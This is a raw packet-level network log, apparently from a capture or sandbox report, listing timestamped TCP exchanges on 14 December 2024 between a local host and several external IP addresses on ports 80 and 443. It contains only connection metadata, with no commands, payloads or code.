Dec 14, 2024 12:56:38.478590012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.478738070 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.479358912 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.479409933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.479413986 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.479548931 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.480411053 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.480464935 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.480470896 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.480635881 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.481254101 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.481302023 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.481368065 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.482177019 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.482332945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.482382059 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.483100891 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.483227015 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.483273983 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.484065056 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.484114885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.484199047 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.484251976 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.484994888 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.485044003 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.485110044 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.485920906 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.486078978 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.486129045 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.486860991 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.486979961 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.487063885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.543941975 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.543997049 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.544034958 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.544120073 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.544430017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.545165062 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.545219898 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.545284986 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.545969009 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.546061039 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.546845913 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.546914101 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.546964884 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.547544956 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.547863960 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.547940016 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.548003912 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.548710108 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.548777103 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.548844099 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.549563885 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.549654007 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.549808979 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.549860954 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.550765991 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.550818920 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.550882101 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.551528931 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.551650047 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.551661968 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.555670023 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.602967024 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.603009939 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.603072882 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.603470087 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.603519917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.603528023 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.603643894 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.604307890 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.604464054 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.604506969 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.605161905 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.605298042 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.605912924 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.606077909 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.606132984 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.606165886 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.606303930 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.606936932 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.607026100 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.607110023 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.607275009 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.607712030 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.607798100 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.607845068 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.608597040 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.608675003 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.608714104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.608930111 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.609513998 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.609570980 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.609643936 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.610505104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.610558033 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.610610962 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.611411095 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.611521959 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.611568928 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.612409115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.612503052 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.612533092 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.612555981 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.613269091 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.613394022 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.613444090 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.614551067 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.614603996 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.614612103 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.614675999 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.615443945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.615499020 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.615531921 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.615550041 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.616445065 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.616498947 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.616992950 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.617263079 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.617326021 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.617362022 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.617362022 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.618040085 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.618158102 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.618354082 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.618959904 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.619009018 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.619075060 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.619165897 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.619880915 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.619972944 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.620027065 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.620834112 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.620893002 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.620929956 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.620973110 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.621776104 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.621825933 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.621920109 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.622713089 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.622837067 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.622899055 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.623629093 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.623683929 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.624406099 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.661715031 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.661744118 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.661771059 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.661798954 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.662058115 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.662091970 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.662153959 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.663024902 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.663074017 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.663856983 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.663914919 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.664108038 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.664237022 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.664956093 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.665005922 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.665075064 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.665751934 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.665865898 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.665918112 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.666675091 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.666810036 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.666825056 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.666855097 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.667751074 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.667804003 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.667865038 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.668555021 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.668684006 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.668740988 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.669500113 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.669547081 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.669636011 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.669769049 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.670500994 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.670548916 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.670614004 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.671371937 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.671375990 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.671508074 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.671653032 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.672353029 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.672480106 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.672509909 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.672669888 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.673274040 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.673335075 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.673405886 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.673449993 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.674237967 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.674326897 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.674381018 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.675123930 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.675213099 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.675251007 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.675652027 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.676086903 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.676196098 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.676233053 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.676246881 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.677016020 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:38.677963018 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:38.770302057 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:38.770603895 CET	49853	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:38.890908003 CET	80	49853	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:38.890953064 CET	80	49823	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:38.891033888 CET	49823	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:38.891196012 CET	49853	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:38.891308069 CET	49853	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:39.011863947 CET	80	49853	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:40.234381914 CET	80	49853	185.215.113.43	192.168.2.4
Dec 14, 2024 12:56:40.234503031 CET	49853	80	192.168.2.4	185.215.113.43
Dec 14, 2024 12:56:40.463387966 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:40.463445902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:40.583836079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:40.583883047 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:40.583955050 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:40.584111929 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:40.593476057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:40.623863935 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.623893023 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624104977 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624109983 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624119997 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624211073 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624238968 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624264002 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624294996 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624382973 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624391079 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624551058 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624703884 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624716997 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624860048 CET	49864	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.624875069 CET	443	49864	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.624979019 CET	49865	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.625013113 CET	443	49865	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.625106096 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:40.625119925 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:40.713704109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.920783997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.920804977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.920824051 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.920842886 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921042919 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:41.921042919 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:41.921114922 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921155930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921175003 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921207905 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921226025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921242952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:41.921264887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:41.921264887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:41.921264887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:41.921308994 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.041203976 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.041234970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.041306973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.041306973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.045273066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.045361042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.045447111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.045507908 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.113261938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.113293886 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.113329887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.113732100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.117171049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.117418051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.117538929 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.117628098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.125560045 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.125614882 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.125750065 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.125869989 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.134197950 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.134221077 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.134407043 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.142405033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.142541885 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.142596006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.142751932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.150863886 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.151048899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.151087999 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.151133060 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.159198046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.159272909 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.159310102 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.159363985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.167834997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.167942047 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.168030977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.168030977 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.176120043 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.176177979 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.176217079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.176671028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.184556961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.184624910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.184650898 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.184926987 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.191903114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.191945076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.191983938 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.199079037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.199152946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.199335098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.305413961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.305434942 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.305660963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.306365013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.306396961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.306643009 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.310928106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.310956001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.310975075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.310996056 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.315469980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.315529108 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.315541029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.315646887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.319801092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.319892883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.320014954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.320224047 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.324790001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.325047970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:42.325107098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:42.328803062 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.329401970 CET	443	49863	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.329670906 CET	49866	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.329679966 CET	443	49866	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:42.329770088 CET	49863	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:42.329785109 CET	443	49863	142.250.181.132	192.168.2.4
